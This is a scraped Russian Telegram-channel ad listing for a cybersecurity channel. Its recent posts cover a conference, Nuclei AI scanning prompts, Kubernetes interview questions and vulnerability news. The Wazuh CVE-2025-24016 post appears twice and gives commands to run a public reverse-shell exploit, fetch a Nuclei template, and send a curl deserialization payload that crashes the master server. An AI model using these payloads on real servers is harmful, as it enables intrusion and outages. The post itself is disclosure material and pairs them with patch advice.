
Получите клиентов в любой нише!
Делегируйте запуск рекламы нам — бесплатно
Подробнее
18.4

Похек
5.0
Канал о кибербезопасности, багбаунти и реальных кейсах из мира ИБ. Новости, полезные инструменты, разборы уязвимостей и советы для специалистов всех уровней. Аудитория — активное ИТ-сообщество, эксперты и новички. Идеальная площадка для рекламы в сфере технологий и ИБ.
Поделиться
В избранное
Купить рекламу в этом канале
Формат:
keyboard_arrow_down
- 1/24
- 2/48
- 3/72
- Нативный
- 7 дней
- Репост
1 час в топе / 24 часа в ленте
Количество:
%keyboard_arrow_down
- 1
- 2
- 3
- 4
- 5
- 8
- 10
- 15
Стоимость публикации:
local_activity
14 685.30₽14 685.30₽local_mall
0.0%
Осталось по этой цене:0
Последние посты канала
play_circleВидео недоступно для предпросмотра
Новость, которая сделает ваш день: мы анонсируем нашу ежегодную конференцию! OFFZONE 2025 пройдет 21 и 22 августа в пространстве GOELRO.
Что будет на конфе
Как всегда в программе: технический контент, стильный мерч и общение с комьюнити. Активности тоже на месте: множество разных хак-квестов, пайка, татуировки — все, чем славится наша конференция.
Собираетесь впервые? Тогда смотрите, как это было в прошлом году.
Что по билетам
Сразу предупредим: в этом году их будет меньше, чем в прошлом. Делаем это для вашего комфорта.
Обо всем подробно расскажем чуть позже. Так что stay tuned!
Узнать больше
1200
08:14
20.02.2025
imageИзображение не доступно для предпросмотра
Интеграция ИИ в Nuclei
В последнем обновлении для нуклей (3.3.9) был добавлен флаг -ai, который позволяет на ходу генерировать темплейт на основе ваших запросов.
Для начала пользования этой фичей нужно получить АПИ токен на сайте ProjectDiscovery. Затем запускаем нуклей с флагом auth:
И добавляем токен. Теперь мы можем пользоваться генератором темплейтов. Запуск выглядит следующим образом:
Таким образом нуклей сгенерирует темплейт для инъекции SQL в параметры с дальнейшим поиском SQL ошибок, флаг -dast разрешает сканнеру проводить тестирование параметров.
Уважаемый Дмитрий АКА @reewardius создал свой сборник уже готовых промптов для разных типов ошибок и уязвимостей. Некоторые из них уже были успешно использованы в качестве теста. Вот несколько из них для примера:
В общем ждем, когда ИИ будет топ 1 на хакерване.
#nuclei #ai
В последнем обновлении для нуклей (3.3.9) был добавлен флаг -ai, который позволяет на ходу генерировать темплейт на основе ваших запросов.
Для начала пользования этой фичей нужно получить АПИ токен на сайте ProjectDiscovery. Затем запускаем нуклей с флагом auth:
nuclei -auth
И добавляем токен. Теперь мы можем пользоваться генератором темплейтов. Запуск выглядит следующим образом:
nuclei -u "http://testphp.vulnweb.com/listproducts.php?cat=1" -ai "Detect SQL errors in response when injecting common payloads into GET and POST requests" -dast
Таким образом нуклей сгенерирует темплейт для инъекции SQL в параметры с дальнейшим поиском SQL ошибок, флаг -dast разрешает сканнеру проводить тестирование параметров.
Уважаемый Дмитрий АКА @reewardius создал свой сборник уже готовых промптов для разных типов ошибок и уязвимостей. Некоторые из них уже были успешно использованы в качестве теста. Вот несколько из них для примера:
-ai "Perform fuzzing on all parameters and HTTP methods using DSL, focusing on detecting XSS vulnerabilities (Reflected, Stored, and DOM-based) with pre-conditions."
-ai "Detect exposed .git repositories and sensitive files"
-ai "Identify default credentials on login pages"
-ai "Identify open FTP servers allowing anonymous access"
В общем ждем, когда ИИ будет топ 1 на хакерване.
#nuclei #ai
1700
14:09
19.02.2025
imageИзображение не доступно для предпросмотра
Топ вопросов и ответов на собеседовании по Kubernetes
#k8s #собес #собеседование #kubernetes
Не то чтобы мне интересно были собеседования, но т.к. самому приходиться изучать кубер, то вопросами с собеса понимаешь что есть минимальная граница знаний, чтобы можно было сказать "я знаю, что такое кубер"
Статья базовая, но подойдёт начинающим DevOps, AppSec, DevSecOps, CloudSec спецам или тем, кто хочет мигрировать в ранее перечисленные должности.
Вопросы на собесе:
➡️ Что такое Kubernetes?
➡️ Перечислите основные компоненты кластера Kubernetes
➡️ Что такое Pod в Kubernetes?
➡️ В чем разница между Deployment и StatefulSet?
➡️ Что такое сервис (service) и какие типы сервисов существуют в Kubernetes?
➡️ Что такое Ingress?
➡️ Что такое Ingress-контроллер?
➡️ Как организовать хранение чувствительных данных (секретов), включая логины, пароли, токены, ключи?
➡️ Что такое метки и селекторы и для чего они используются?
➡️ Что такое пробы (probes) в Kubernetes, какие типы проб существуют и для чего используются?
➡️ Что такое Pod Disruption Budget и для чего используется?
➡️ Как контролировать использование ресурсов для контейнеров?
➡️ Как предоставить доступ до запущенного приложения из внешней сети?
➡️ Что такое CNI-интерфейс?
➡️ Что такое CRI?
➡️ Что такое Persistent Volume (PV)?
➡️ Что такое Persistent Volume Claim (PVC)?
➡️ Как назначать права доступа в кластере Kubernetes?
А ответы на эти вопросы вы прочитаете в статье на Хабре))
➡️ Узнать ответы
P.S. если ответить самому себе честно, на сколько вопросов из 18 вы смогли ответить?
🌚 @poxek | 📺 YT | 📺 RT | 📺 VK | 🌚 Магазин мерча
#k8s #собес #собеседование #kubernetes
Не то чтобы мне интересно были собеседования, но т.к. самому приходиться изучать кубер, то вопросами с собеса понимаешь что есть минимальная граница знаний, чтобы можно было сказать "я знаю, что такое кубер"
Статья базовая, но подойдёт начинающим DevOps, AppSec, DevSecOps, CloudSec спецам или тем, кто хочет мигрировать в ранее перечисленные должности.
Вопросы на собесе:
А ответы на эти вопросы вы прочитаете в статье на Хабре))
1900
10:03
19.02.2025
play_circleВидео недоступно для предпросмотра
В условиях роста количества и усложнения кибератак отсутствие автоматизированных подходов к реагированию на инциденты ИБ увеличивает риски для бизнеса. Только 36% компаний выявляют нарушителей в большинстве случаев, а почти четверть уже сталкивались с критичными кибератаками.
20 февраля в 11:00 мск в формате живого диалога обсудим результаты исследования и поделимся экспертным прогнозом о развитии рынка SOC.
Кстати, все зарегистрированные участники в числе первых получат полный текст исследования до митапа. Зарегистрироваться на онлайн-митап можно по ссылке 😉
Реклама. АО "К2 ИНТЕГРАЦИЯ". ИНН 7701829110
К2 Кибербезопасность и Kaspersky провели более 100 глубинных интервью в Enterprise-сегменте и выяснили, как бизнес подходит к построению процессов мониторинга и реагирования.
20 февраля в 11:00 мск в формате живого диалога обсудим результаты исследования и поделимся экспертным прогнозом о развитии рынка SOC.
В программе встречи:
✅ Как SOC ускоряет обнаружение и устранение инцидентов
✅ В чем преимущества MSSP-модели по сравнению с другими моделями
✅ О чем надо помнить при построении собственного SOC
✅ На что нужно обращать внимание при выборе провайдера услуг.
Кстати, все зарегистрированные участники в числе первых получат полный текст исследования до митапа. Зарегистрироваться на онлайн-митап можно по ссылке 😉
Реклама. АО "К2 ИНТЕГРАЦИЯ". ИНН 7701829110
1600
09:01
19.02.2025
Похек pinned a photo
0
12:31
18.02.2025
imageИзображение не доступно для предпросмотра
Wazuh RCE via Unsafe Deserialization CVE-2025-24016
#CVE@poxek #wazuh #deserialization #RCE
В Wazuh-серверах (используемых для предотвращения, обнаружения и реагирования на угрозы) обнаружена критическая уязвимость, связанная с небезопасной десериализацией данных. Проблема возникает из-за способа сериализации параметров
➡️ Уязвимые версии
От версии 4.4.0 до версии 4.9.0 (уязвимость устранена в версии 4.9.1)
PoC 1. Эксплойт на python3
Скрипт позволяет сразу сделать reverse shell
PoC 2. Шаблон для nuclei
Там есть пометка в комментах, что если есть авторизация, то раскомментировать строку
PoC 3. Ручная эксплуатация
Этот запрос эксплуатирует некорректную десериализацию и приведёт к завершению работы мастер-сервера.
📌 Пояснение к уязвимости от разработчиков Wazuh ТЫК
➡️ Рекомендации
▪️ Обновление ПО: Обязательно обновите Wazuh до версии 4.9.1 или выше, где уязвимость устранена.
▪️ Ограничение доступа: Проверьте и ограничьте доступ к API.
🌚 @poxek | 📺 YT | 📺 RT | 📺 VK | 🌚 Магазин мерча
#CVE@poxek #wazuh #deserialization #RCE
В Wazuh-серверах (используемых для предотвращения, обнаружения и реагирования на угрозы) обнаружена критическая уязвимость, связанная с небезопасной десериализацией данных. Проблема возникает из-за способа сериализации параметров
DistributedAPI
в формате JSON и последующей десериализации через функцию as_wazuh_object
(расположенную в framework/wazuh/core/cluster/common.py
). Если злоумышленник внедрит небезопасный словарь в запрос или ответ DAPI, это может привести к генерации необработанного исключения (__unhandled_exc__
) и, как следствие, выполнению произвольного Python-кода, что позволяет дистанционно выполнить код на сервере. От версии 4.4.0 до версии 4.9.0 (уязвимость устранена в версии 4.9.1)
PoC 1. Эксплойт на python3
git clone https://github.com/0xjessie21/CVE-2025-24016.git
cd CVE-2025-24016/
python3 -m venv venv; source venv/bin/activate
pip install -r requirements.txt
Скрипт позволяет сразу сделать reverse shell
python3 CVE-2025-24016.py -u <url> -i <IP> -p <PORT>
PoC 2. Шаблон для nuclei
wget https://raw.githubusercontent.com/huseyinstif/CVE-2025-24016-Nuclei-Template/refs/heads/main/CVE-2025-24016.yaml
Там есть пометка в комментах, что если есть авторизация, то раскомментировать строку
PoC 3. Ручная эксплуатация
curl -X POST -k -u "wazuh-wui:MyS3cr37P450r.*-" -H "Content-Type: application/json" --data '{"unhandled_exc":{"class": "exit", "args": []}}' https://<worker-server>:55000/security/user/authenticate/run_as
Этот запрос эксплуатирует некорректную десериализацию и приведёт к завершению работы мастер-сервера.
2900
10:43
18.02.2025
imageИзображение не доступно для предпросмотра
Wazuh RCE via Unsafe Deserialization CVE-2025-24016
#CVE@poxek #wazuh #deserialization #RCE
В Wazuh-серверах (используемых для предотвращения, обнаружения и реагирования на угрозы) обнаружена критическая уязвимость, связанная с небезопасной десериализацией данных. Проблема возникает из-за способа сериализации параметров
➡️ Уязвимые версии
От версии 4.4.0 до версии 4.9.0 (уязвимость устранена в версии 4.9.1)
PoC 1. Эксплойт на python3
Скрипт позволяет сразу сделать reverse shell
PoC 2. Шаблон для nuclei
Там есть пометка в комментах, что если есть авторизация, то раскомментировать строку
PoC 3. Ручная эксплуатация
Этот запрос эксплуатирует некорректную десериализацию и приведёт к завершению работы мастер-сервера.
📌 Пояснение к уязвимости от разработчиков Wazuh ТЫК
➡️ Рекомендации
▪️ Обновление ПО: Обязательно обновите Wazuh до версии 4.9.1 или выше, где уязвимость устранена.
▪️ Ограничение доступа: Проверьте и ограничьте доступ к API.
🌚 @poxek | 📺 YT | 📺 RT | 📺 VK | 🌚 Магазин мерча
#CVE@poxek #wazuh #deserialization #RCE
В Wazuh-серверах (используемых для предотвращения, обнаружения и реагирования на угрозы) обнаружена критическая уязвимость, связанная с небезопасной десериализацией данных. Проблема возникает из-за способа сериализации параметров
DistributedAPI
в формате JSON и последующей десериализации через функцию as_wazuh_object
(расположенную в framework/wazuh/core/cluster/common.py
). Если злоумышленник внедрит небезопасный словарь в запрос или ответ DAPI, это может привести к генерации необработанного исключения (__unhandled_exc__
) и, как следствие, выполнению произвольного Python-кода, что позволяет дистанционно выполнить код на сервере. От версии 4.4.0 до версии 4.9.0 (уязвимость устранена в версии 4.9.1)
PoC 1. Эксплойт на python3
git clone https://github.com/0xjessie21/CVE-2025-24016.git
cd CVE-2025-24016/
python3 -m venv venv; source venv/bin/activate
pip install -r requirements.txt
Скрипт позволяет сразу сделать reverse shell
python3 CVE-2025-24016.py -u <url> -i <IP> -p <PORT>
PoC 2. Шаблон для nuclei
wget https://raw.githubusercontent.com/huseyinstif/CVE-2025-24016-Nuclei-Template/refs/heads/main/CVE-2025-24016.yaml
Там есть пометка в комментах, что если есть авторизация, то раскомментировать строку
PoC 3. Ручная эксплуатация
curl -X POST -k -u "wazuh-wui:MyS3cr37P450r.*-" -H "Content-Type: application/json" --data '{"unhandled_exc":{"class": "exit", "args": []}}' https://<worker-server>:55000/security/user/authenticate/run_as
Этот запрос эксплуатирует некорректную десериализацию и приведёт к завершению работы мастер-сервера.
2900
10:43
18.02.2025
Похек pinned a photo
0
14:43
17.02.2025
imageИзображение не доступно для предпросмотра
Ломаем ваши видеокарты: распаковка эксплойта для CVE-2024-0132 под NVIDIA Container Toolkit
#nvidia #CVE@poxek #container
В сентябре 2024 года компания WIZ обнаружила критическую уязвимость в системе безопасности, обозначенную как CVE-2024-0132, которая затрагивала все версии NVIDIA Container Toolkit.
Уязвимость была устранена в NVIDIA Container Toolkit v1.16.2 и NVIDIA GPU Operator v24.6.2, однако технические детали раскрыты только 11 февраля 2024 года. В рамках нашей работы нам пришлось разобрать патч и проэксплуатировать эту уязвимость до выхода информации от авторов оригинальной уязвимости.
P.s. респект команде Luntry
➡️ Подробности
🌚 @poxek | 📺 YT | 📺 RT | 📺 VK | 🌚 Магазин мерча
#nvidia #CVE@poxek #container
В сентябре 2024 года компания WIZ обнаружила критическую уязвимость в системе безопасности, обозначенную как CVE-2024-0132, которая затрагивала все версии NVIDIA Container Toolkit.
Уязвимость была устранена в NVIDIA Container Toolkit v1.16.2 и NVIDIA GPU Operator v24.6.2, однако технические детали раскрыты только 11 февраля 2024 года. В рамках нашей работы нам пришлось разобрать патч и проэксплуатировать эту уязвимость до выхода информации от авторов оригинальной уязвимости.
P.s. респект команде Luntry
3200
14:26
17.02.2025
imageИзображение не доступно для предпросмотра
Ломаем ваши видеокарты: распаковка эксплойта для CVE-2024-0132 под NVIDIA Container Toolkit
#nvidia #CVE@poxek #container
В сентябре 2024 года компания WIZ обнаружила критическую уязвимость в системе безопасности, обозначенную как CVE-2024-0132, которая затрагивала все версии NVIDIA Container Toolkit.
Уязвимость была устранена в NVIDIA Container Toolkit v1.16.2 и NVIDIA GPU Operator v24.6.2, однако технические детали раскрыты только 11 февраля 2024 года. В рамках нашей работы нам пришлось разобрать патч и проэксплуатировать эту уязвимость до выхода информации от авторов оригинальной уязвимости.
P.s. респект команде Luntry
➡️ Подробности
🌚 @poxek | 📺 YT | 📺 RT | 📺 VK | 🌚 Магазин мерча
#nvidia #CVE@poxek #container
В сентябре 2024 года компания WIZ обнаружила критическую уязвимость в системе безопасности, обозначенную как CVE-2024-0132, которая затрагивала все версии NVIDIA Container Toolkit.
Уязвимость была устранена в NVIDIA Container Toolkit v1.16.2 и NVIDIA GPU Operator v24.6.2, однако технические детали раскрыты только 11 февраля 2024 года. В рамках нашей работы нам пришлось разобрать патч и проэксплуатировать эту уязвимость до выхода информации от авторов оригинальной уязвимости.
P.s. респект команде Luntry
3200
14:26
17.02.2025
close
С этим каналом часто покупают
Отзывы канала
keyboard_arrow_down
- Добавлен: Сначала новые
- Добавлен: Сначала старые
- Оценка: По убыванию
- Оценка: По возрастанию
5.0
1 отзыва за 6 мес.
Превосходно (100%) За последние 6 мес
k
**tech.tg@******.ru
на сервисе с июля 2024
19.02.202514:23
5
Четкое соблюдение ТЗ
Лучшие в тематике
Новинки в тематике
Статистика канала
Рейтинг
18.4
Оценка отзывов
5.0
Выполнено заявок
2
Подписчики:
13.8K
Просмотры на пост:
lock_outline
ER:
13.8%
Публикаций в день:
1.0
CPV
lock_outlineВыбрано
0
каналов на сумму:0.00₽
Подписчики:
0
Просмотры:
lock_outline
Перейти в корзинуКупить за:0.00₽
Комментарий